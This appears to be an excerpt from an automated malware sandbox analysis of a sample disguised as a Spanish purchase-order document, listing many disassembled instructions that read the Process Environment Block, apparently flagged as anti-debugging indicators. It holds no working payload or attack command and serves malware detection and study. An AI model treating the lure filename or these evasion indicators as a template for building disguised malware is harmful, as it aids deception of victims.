Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E53E mov eax, dword ptr fs:[00000030h]	6_2_0168E53E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E53E mov eax, dword ptr fs:[00000030h]	6_2_0168E53E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E53E mov eax, dword ptr fs:[00000030h]	6_2_0168E53E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E53E mov eax, dword ptr fs:[00000030h]	6_2_0168E53E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F6500 mov eax, dword ptr fs:[00000030h]	6_2_016F6500
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01734500 mov eax, dword ptr fs:[00000030h]	6_2_01734500
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01734500 mov eax, dword ptr fs:[00000030h]	6_2_01734500
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01734500 mov eax, dword ptr fs:[00000030h]	6_2_01734500
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01734500 mov eax, dword ptr fs:[00000030h]	6_2_01734500
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01734500 mov eax, dword ptr fs:[00000030h]	6_2_01734500
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01734500 mov eax, dword ptr fs:[00000030h]	6_2_01734500
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01734500 mov eax, dword ptr fs:[00000030h]	6_2_01734500
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169C5ED mov eax, dword ptr fs:[00000030h]	6_2_0169C5ED
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169C5ED mov eax, dword ptr fs:[00000030h]	6_2_0169C5ED
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016625E0 mov eax, dword ptr fs:[00000030h]	6_2_016625E0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0168E5E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0168E5E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0168E5E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0168E5E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0168E5E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0168E5E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0168E5E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0168E5E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E5CF mov eax, dword ptr fs:[00000030h]	6_2_0169E5CF
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E5CF mov eax, dword ptr fs:[00000030h]	6_2_0169E5CF
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016665D0 mov eax, dword ptr fs:[00000030h]	6_2_016665D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0169A5D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0169A5D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E05A7 mov eax, dword ptr fs:[00000030h]	6_2_016E05A7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E05A7 mov eax, dword ptr fs:[00000030h]	6_2_016E05A7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E05A7 mov eax, dword ptr fs:[00000030h]	6_2_016E05A7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016845B1 mov eax, dword ptr fs:[00000030h]	6_2_016845B1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016845B1 mov eax, dword ptr fs:[00000030h]	6_2_016845B1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01694588 mov eax, dword ptr fs:[00000030h]	6_2_01694588
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01662582 mov eax, dword ptr fs:[00000030h]	6_2_01662582
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01662582 mov ecx, dword ptr fs:[00000030h]	6_2_01662582
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E59C mov eax, dword ptr fs:[00000030h]	6_2_0169E59C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EC460 mov ecx, dword ptr fs:[00000030h]	6_2_016EC460
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168A470 mov eax, dword ptr fs:[00000030h]	6_2_0168A470
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168A470 mov eax, dword ptr fs:[00000030h]	6_2_0168A470
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168A470 mov eax, dword ptr fs:[00000030h]	6_2_0168A470
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171A456 mov eax, dword ptr fs:[00000030h]	6_2_0171A456
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E443 mov eax, dword ptr fs:[00000030h]	6_2_0169E443
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E443 mov eax, dword ptr fs:[00000030h]	6_2_0169E443
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E443 mov eax, dword ptr fs:[00000030h]	6_2_0169E443
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E443 mov eax, dword ptr fs:[00000030h]	6_2_0169E443
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E443 mov eax, dword ptr fs:[00000030h]	6_2_0169E443
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E443 mov eax, dword ptr fs:[00000030h]	6_2_0169E443
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E443 mov eax, dword ptr fs:[00000030h]	6_2_0169E443
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E443 mov eax, dword ptr fs:[00000030h]	6_2_0169E443
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168245A mov eax, dword ptr fs:[00000030h]	6_2_0168245A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165645D mov eax, dword ptr fs:[00000030h]	6_2_0165645D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165C427 mov eax, dword ptr fs:[00000030h]	6_2_0165C427
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165E420 mov eax, dword ptr fs:[00000030h]	6_2_0165E420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165E420 mov eax, dword ptr fs:[00000030h]	6_2_0165E420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165E420 mov eax, dword ptr fs:[00000030h]	6_2_0165E420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E6420 mov eax, dword ptr fs:[00000030h]	6_2_016E6420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E6420 mov eax, dword ptr fs:[00000030h]	6_2_016E6420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E6420 mov eax, dword ptr fs:[00000030h]	6_2_016E6420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E6420 mov eax, dword ptr fs:[00000030h]	6_2_016E6420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E6420 mov eax, dword ptr fs:[00000030h]	6_2_016E6420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E6420 mov eax, dword ptr fs:[00000030h]	6_2_016E6420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E6420 mov eax, dword ptr fs:[00000030h]	6_2_016E6420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A430 mov eax, dword ptr fs:[00000030h]	6_2_0169A430
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01698402 mov eax, dword ptr fs:[00000030h]	6_2_01698402
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01698402 mov eax, dword ptr fs:[00000030h]	6_2_01698402
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01698402 mov eax, dword ptr fs:[00000030h]	6_2_01698402
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016604E5 mov ecx, dword ptr fs:[00000030h]	6_2_016604E5
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016664AB mov eax, dword ptr fs:[00000030h]	6_2_016664AB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016944B0 mov ecx, dword ptr fs:[00000030h]	6_2_016944B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EA4B0 mov eax, dword ptr fs:[00000030h]	6_2_016EA4B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171A49A mov eax, dword ptr fs:[00000030h]	6_2_0171A49A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01668770 mov eax, dword ptr fs:[00000030h]	6_2_01668770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770 mov eax, dword ptr fs:[00000030h]	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169674D mov esi, dword ptr fs:[00000030h]	6_2_0169674D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169674D mov eax, dword ptr fs:[00000030h]	6_2_0169674D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169674D mov eax, dword ptr fs:[00000030h]	6_2_0169674D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EE75D mov eax, dword ptr fs:[00000030h]	6_2_016EE75D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660750 mov eax, dword ptr fs:[00000030h]	6_2_01660750
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2750 mov eax, dword ptr fs:[00000030h]	6_2_016A2750
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2750 mov eax, dword ptr fs:[00000030h]	6_2_016A2750
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E4755 mov eax, dword ptr fs:[00000030h]	6_2_016E4755
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169C720 mov eax, dword ptr fs:[00000030h]	6_2_0169C720
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169C720 mov eax, dword ptr fs:[00000030h]	6_2_0169C720
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169273C mov eax, dword ptr fs:[00000030h]	6_2_0169273C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169273C mov ecx, dword ptr fs:[00000030h]	6_2_0169273C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169273C mov eax, dword ptr fs:[00000030h]	6_2_0169273C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DC730 mov eax, dword ptr fs:[00000030h]	6_2_016DC730
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169C700 mov eax, dword ptr fs:[00000030h]	6_2_0169C700
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660710 mov eax, dword ptr fs:[00000030h]	6_2_01660710
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01690710 mov eax, dword ptr fs:[00000030h]	6_2_01690710
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016827ED mov eax, dword ptr fs:[00000030h]	6_2_016827ED
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016827ED mov eax, dword ptr fs:[00000030h]	6_2_016827ED
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016827ED mov eax, dword ptr fs:[00000030h]	6_2_016827ED
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EE7E1 mov eax, dword ptr fs:[00000030h]	6_2_016EE7E1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016647FB mov eax, dword ptr fs:[00000030h]	6_2_016647FB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016647FB mov eax, dword ptr fs:[00000030h]	6_2_016647FB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0166C7C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E07C3 mov eax, dword ptr fs:[00000030h]	6_2_016E07C3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016607AF mov eax, dword ptr fs:[00000030h]	6_2_016607AF
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017147A0 mov eax, dword ptr fs:[00000030h]	6_2_017147A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170678E mov eax, dword ptr fs:[00000030h]	6_2_0170678E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A660 mov eax, dword ptr fs:[00000030h]	6_2_0169A660
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A660 mov eax, dword ptr fs:[00000030h]	6_2_0169A660
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172866E mov eax, dword ptr fs:[00000030h]	6_2_0172866E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172866E mov eax, dword ptr fs:[00000030h]	6_2_0172866E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01692674 mov eax, dword ptr fs:[00000030h]	6_2_01692674
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167C640 mov eax, dword ptr fs:[00000030h]	6_2_0167C640
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E627 mov eax, dword ptr fs:[00000030h]	6_2_0167E627
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01696620 mov eax, dword ptr fs:[00000030h]	6_2_01696620
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01698620 mov eax, dword ptr fs:[00000030h]	6_2_01698620
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166262C mov eax, dword ptr fs:[00000030h]	6_2_0166262C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE609 mov eax, dword ptr fs:[00000030h]	6_2_016DE609
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167260B mov eax, dword ptr fs:[00000030h]	6_2_0167260B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167260B mov eax, dword ptr fs:[00000030h]	6_2_0167260B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167260B mov eax, dword ptr fs:[00000030h]	6_2_0167260B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167260B mov eax, dword ptr fs:[00000030h]	6_2_0167260B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167260B mov eax, dword ptr fs:[00000030h]	6_2_0167260B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167260B mov eax, dword ptr fs:[00000030h]	6_2_0167260B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167260B mov eax, dword ptr fs:[00000030h]	6_2_0167260B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2619 mov eax, dword ptr fs:[00000030h]	6_2_016A2619
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_016DE6F2
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_016DE6F2
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_016DE6F2
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_016DE6F2
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E06F1 mov eax, dword ptr fs:[00000030h]	6_2_016E06F1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E06F1 mov eax, dword ptr fs:[00000030h]	6_2_016E06F1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0169A6C7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0169A6C7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0169C6A6
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016966B0 mov eax, dword ptr fs:[00000030h]	6_2_016966B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01664690 mov eax, dword ptr fs:[00000030h]	6_2_01664690
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01664690 mov eax, dword ptr fs:[00000030h]	6_2_01664690
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A096E mov eax, dword ptr fs:[00000030h]	6_2_016A096E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A096E mov edx, dword ptr fs:[00000030h]	6_2_016A096E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A096E mov eax, dword ptr fs:[00000030h]	6_2_016A096E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01704978 mov eax, dword ptr fs:[00000030h]	6_2_01704978
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01704978 mov eax, dword ptr fs:[00000030h]	6_2_01704978
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01686962 mov eax, dword ptr fs:[00000030h]	6_2_01686962
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01686962 mov eax, dword ptr fs:[00000030h]	6_2_01686962
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01686962 mov eax, dword ptr fs:[00000030h]	6_2_01686962
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EC97C mov eax, dword ptr fs:[00000030h]	6_2_016EC97C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E0946 mov eax, dword ptr fs:[00000030h]	6_2_016E0946
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E892A mov eax, dword ptr fs:[00000030h]	6_2_016E892A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F892B mov eax, dword ptr fs:[00000030h]	6_2_016F892B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE908 mov eax, dword ptr fs:[00000030h]	6_2_016DE908
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DE908 mov eax, dword ptr fs:[00000030h]	6_2_016DE908
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EC912 mov eax, dword ptr fs:[00000030h]	6_2_016EC912
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01658918 mov eax, dword ptr fs:[00000030h]	6_2_01658918
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01658918 mov eax, dword ptr fs:[00000030h]	6_2_01658918
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EE9E0 mov eax, dword ptr fs:[00000030h]	6_2_016EE9E0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016929F9 mov eax, dword ptr fs:[00000030h]	6_2_016929F9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016929F9 mov eax, dword ptr fs:[00000030h]	6_2_016929F9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172A9D3 mov eax, dword ptr fs:[00000030h]	6_2_0172A9D3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F69C0 mov eax, dword ptr fs:[00000030h]	6_2_016F69C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0166A9D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0166A9D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0166A9D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0166A9D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0166A9D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0166A9D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016949D0 mov eax, dword ptr fs:[00000030h]	6_2_016949D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0 mov eax, dword ptr fs:[00000030h]	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016609AD mov eax, dword ptr fs:[00000030h]	6_2_016609AD
